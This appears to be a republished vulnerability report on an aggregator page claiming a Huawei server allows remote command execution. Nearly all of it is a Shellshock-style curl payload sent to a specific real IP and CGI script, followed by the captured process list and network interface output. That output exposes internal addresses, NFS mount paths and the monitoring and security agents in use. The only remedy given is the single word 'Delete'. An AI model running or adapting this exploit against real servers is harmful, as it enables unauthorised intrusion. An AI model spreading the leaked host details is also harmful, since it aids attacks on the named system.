A Huawei server has a remote command execution vulnerability.

Source: Internet
Author: User
Tags ossec

A Huawei server has a remote command execution vulnerability.

A Huawei server has a remote command execution vulnerability.

Curl http: // 122.11.38.69: 8082/cgi-bin/test-cgi-A "() {foo ;}; echo;/bin/ps-ef"-k

UID        PID  PPID  C STIME TTY          TIME CMDroot         1     0  0  2012 ?        00:10:41 init [3]           root         2     0  0  2012 ?        00:00:00 [kthreadd]root         3     2  0  2012 ?        00:00:35 [migration/0]root         4     2  0  2012 ?        00:02:56 [ksoftirqd/0]root         5     2  0  2012 ?        00:21:44 [events/0]root         6     2  0  2012 ?        00:00:00 [cpuset]root         7     2  0  2012 ?        00:00:00 [khelper]root         8     2  0  2012 ?        00:00:00 [netns]root         9     2  0  2012 ?        00:00:00 [async/mgr]root        10     2  0  2012 ?        00:00:00 [pm]root        11     2  0  2012 ?        00:00:00 [xenwatch]root        12     2  0  2012 ?        00:00:00 [xenbus]root        14     2  0  2012 ?        00:00:54 [migration/1]root        15     2  0  2012 ?        00:01:11 [ksoftirqd/1]root        16     2  0  2012 ?        00:22:34 [events/1]root        17     2  0  2012 ?        00:00:50 [migration/2]root        18     2  0  2012 ?        00:01:30 [ksoftirqd/2]root        19     2  0  2012 ?        00:27:36 [events/2]root        20     2  0  2012 ?        00:00:44 [migration/3]root        21     2  0  2012 ?        00:00:56 [ksoftirqd/3]root        22     2  0  2012 ?        01:27:20 [events/3]root        23     2  0  2012 ?        00:01:27 [sync_supers]root        24     2  0  2012 ?        00:01:42 [bdi-default]root        25     2  0  2012 ?        00:00:00 [kintegrityd/0]root        26     2  0  2012 ?        00:00:00 [kintegrityd/1]root        27     2  0  2012 ?        00:00:00 [kintegrityd/2]root        28     2  0  2012 ?        00:00:00 [kintegrityd/3]root        29     2  0  2012 ?        00:00:00 [kblockd/0]root        30     2  0  2012 ?        00:00:00 [kblockd/1]root        31     2  0  2012 ?        00:00:00 [kblockd/2]root        32     2  0  2012 ?        00:00:00 [kblockd/3]root        33     2  0  2012 ?        00:00:00 [kseriod]root        38     2  0  2012 ?        00:00:00 [khungtaskd]root        39     2  0  2012 ?        00:00:00 [kswapd0]root        40     2  0  2012 ?        00:00:00 [aio/0]root        41     2  0  2012 ?        00:00:00 [aio/1]root        42     2  0  2012 ?        00:00:00 [aio/2]root        43     2  0  2012 ?        00:00:00 [aio/3]root        44     2  0  2012 ?        00:00:00 [crypto/0]root        45     2  0  2012 ?        00:00:00 [crypto/1]root        46     2  0  2012 ?        00:00:00 [crypto/2]root        47     2  0  2012 ?        00:00:00 [crypto/3]root        49     2  0  2012 ?        00:00:00 [kpsmoused]root        50     2  0  2012 ?        00:00:00 [xenfb thread]root       153     2  0  2012 ?        00:00:00 [net_accel/0]root       154     2  0  2012 ?        00:00:00 [net_accel/1]root       155     2  0  2012 ?        00:00:00 [net_accel/2]root       156     2  0  2012 ?        00:00:00 [net_accel/3]root       459     2  0  2012 ?        00:03:43 [kjournald]root       530     1  0  2012 ?        00:00:00 /sbin/udevd --daemonroot       865     2  0  2012 ?        00:00:00 [kstriped]root       949     2  0  2012 ?        00:05:57 [kjournald]100       1389     1  0  2012 ?        00:01:37 /bin/dbus-daemon --system101       1460     1  0  2012 ?        00:00:26 /usr/sbin/hald --daemon=yesroot      1463     1  0  2012 ?        00:00:24 /usr/sbin/console-kit-daemonroot      1526  1460  0  2012 ?        00:00:00 hald-runnerroot      3290     1  0  2013 ?        00:00:00 bash -c umount  -l  /opt/huawei/ttgo/file/fileup ; umount -l /opt/huawei/ttgo/fileroot      3314  3290  0  2013 ?        00:00:15 umount -l /opt/huawei/ttgo/file/fileuproot      3320     1  0  2013 ?        00:00:13 df -hroot      3369     1  0  2013 ?        00:00:00 bash -c umount  -l  /opt/huawei/ttgo/file/fileup ; umount -l /opt/huawei/ttgo/fileroot      3393  3369  0  2013 ?        00:00:00 umount -l /opt/huawei/ttgo/file/fileuproot      3565     1  0  2013 ?        00:00:00 sh /etc/init.d/boot.localroot      3590  3565  0  2013 ?        00:00:00 mount 10.11.121.206:/opt/huawei/FileData_RAID10 /opt/huawei/ttgo/file/root      3591  3590  0  2013 ?        00:00:00 /sbin/mount.nfs 10.11.121.206:/opt/huawei/FileData_RAID10 /opt/huawei/ttgo/file/ -o rwroot      3689     1  0  2012 ?        00:00:30 /sbin/auditd -s disableroot      3691  3689  0  2012 ?        00:01:15 /sbin/audispdroot      3692     2  0  2012 ?        00:00:00 [kauditd]root      3713     1  0  2012 ?        00:01:09 /sbin/rpcbindroot      3929     1  0  2012 ?        00:00:00 /usr/sbin/sshd -o PidFile=/var/run/sshd.init.pidroot      3968     1  0  2012 ?        02:02:08 /usr/sbin/irqbalanceroot      3981     1  0  2012 ?        00:08:10 /usr/sbin/nscdroot      4011     1  0  2012 ?        00:09:24 /usr/sbin/cronroot      4026     1  0  2012 tty1     00:00:00 /sbin/mingetty --noclear tty1root      4027     1  0  2012 tty2     00:00:00 /sbin/mingetty tty2root      4028     1  0  2012 tty3     00:00:00 /sbin/mingetty tty3root      4029     1  0  2012 tty4     00:00:00 /sbin/mingetty tty4root      4030     1  0  2012 tty5     00:00:00 /sbin/mingetty tty5root      4031     1  0  2012 tty6     00:00:00 /sbin/mingetty tty6ttgo      6092     1  0  2014 ?        21:53:16 /opt/huawei/ttgo/push/jdk/bin/java -Djava.util.logging.config.file=/opt/huawei/ttgo/push/tomcat/conf/logging.properties -Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager -Djava.endorsed.dirs=/opt/huawei/ttgo/push/tomcat/endorsed -classpath /opt/huawei/ttgo/push/tomcat/bin/bootstrap.jar:/opt/huawei/ttgo/push/tomcat/bin/tomcat-juli.jar -Dcatalina.base=/opt/huawei/ttgo/push/tomcat -Dcatalina.home=/opt/huawei/ttgo/push/tomcat -Djava.io.tmpdir=/opt/huawei/ttgo/push/tomcat/temp org.apache.catalina.startup.Bootstrap startroot      7944     2  0  2012 ?        00:00:08 [rpciod/0]root      7945     2  0  2012 ?        00:00:01 [rpciod/1]root      7946     2  0  2012 ?        00:00:01 [rpciod/2]root      7947     2  0  2012 ?        00:00:00 [rpciod/3]root      7951     2  0  2012 ?        00:00:00 [kslowd000]root      7952     2  0  2012 ?        00:00:00 [kslowd001]root      7955     2  0  2012 ?        00:00:00 [nfsiod]root     10152     2  0  2012 ?        00:00:04 [kjournald]root     10836     1  0  2014 ?        00:02:02 /sbin/syslog-ngroot     10839     1  0  2014 ?        00:00:00 /sbin/klogd -c 1 -xttgo     11297 11463  0 17:51 ?        00:00:00 /opt/huawei/ttgo/push/cloudServer/apache/bin/httpd -k start -f /opt/huawei/ttgo/push/cloudServer/apache/conf/httpd.confttgo     11463     1  0  2012 ?        01:56:36 /opt/huawei/ttgo/push/cloudServer/apache/bin/httpd -k start -f /opt/huawei/ttgo/push/cloudServer/apache/conf/httpd.confttgo     11466 11463  0  2012 ?        00:00:00 /opt/huawei/ttgo/push/cloudServer/apache/bin/httpd -k start -f /opt/huawei/ttgo/push/cloudServer/apache/conf/httpd.confroot     12243     2  0 18:48 ?        00:00:00 [flush-202:16]ttgo     12249 11466  0 18:48 ?        00:00:00 /bin/sh /opt/huawei/ttgo/push/cloudServer/apache/cgi-bin/test-cgittgo     12250 12249  0 18:48 ?        00:00:00 /bin/ps -efroot     16017     1  0  2012 ?        00:00:00 rpc.statd --no-notifyroot     16026     2  0  2012 ?        00:00:00 [lockd]zabbix   21920     1  0  2013 ?        00:00:00 /opt/zabbix/sbin/zabbix_agentdzabbix   21921 21920  0  2013 ?        11:56:03 /opt/zabbix/sbin/zabbix_agentdzabbix   21922 21920  0  2013 ?        00:24:17 /opt/zabbix/sbin/zabbix_agentdzabbix   21923 21920  0  2013 ?        00:24:17 /opt/zabbix/sbin/zabbix_agentdzabbix   21924 21920  0  2013 ?        00:24:16 /opt/zabbix/sbin/zabbix_agentdzabbix   21925 21920  0  2013 ?        09:52:21 /opt/zabbix/sbin/zabbix_agentdroot     22136     1  0  2012 ?        00:00:00 /sbin/agetty -L 9600 xvc0 xtermroot     22368     2  0  2012 ?        00:10:55 [flush-202:0]ntp      23389     1  0  2012 ?        00:45:34 /usr/sbin/ntpd -p /var/run/ntp/ntpd.pid -g -u ntp:ntp -i /var/lib/ntp -c /etc/ntp.confroot     31936     1  0  2013 ?        00:00:13 /var/ossec/bin/ossec-execdossec    31940     1  0  2013 ?        00:26:07 /var/ossec/bin/ossec-agentdroot     31944     1  0  2013 ?        00:14:32 /var/ossec/bin/ossec-logcollectorroot     31948     1  0  2013 ?        2-04:11:29 /var/ossec/bin/ossec-syscheckd
eth0      Link encap:Ethernet  HWaddr 00:16:3E:0B:20:70            inet addr:10.11.32.112  Bcast:10.11.32.255  Mask:255.255.255.0          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1          RX packets:622434337 errors:0 dropped:0 overruns:0 frame:0          TX packets:405783654 errors:0 dropped:0 overruns:0 carrier:0          collisions:0 txqueuelen:1000           RX bytes:51098113331 (48730.9 Mb)  TX bytes:32920068898 (31395.0 Mb)lo        Link encap:Local Loopback            inet addr:127.0.0.1  Mask:255.0.0.0          UP LOOPBACK RUNNING  MTU:16436  Metric:1          RX packets:362 errors:0 dropped:0 overruns:0 frame:0          TX packets:362 errors:0 dropped:0 overruns:0 carrier:0          collisions:0 txqueuelen:0           RX bytes:33120 (32.3 Kb)  TX bytes:33120 (32.3 Kb)

 

Solution:

Delete

 

Related Article

E-Commerce Solutions

Leverage the same tools powering the Alibaba Ecosystem

Learn more >

Apsara Conference 2019

The Rise of Data Intelligence, September 25th - 27th, Hangzhou, China

Learn more >

Alibaba Cloud Free Trial

Learn and experience the power of Alibaba Cloud with a free trial worth $300-1200 USD

Learn more >

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.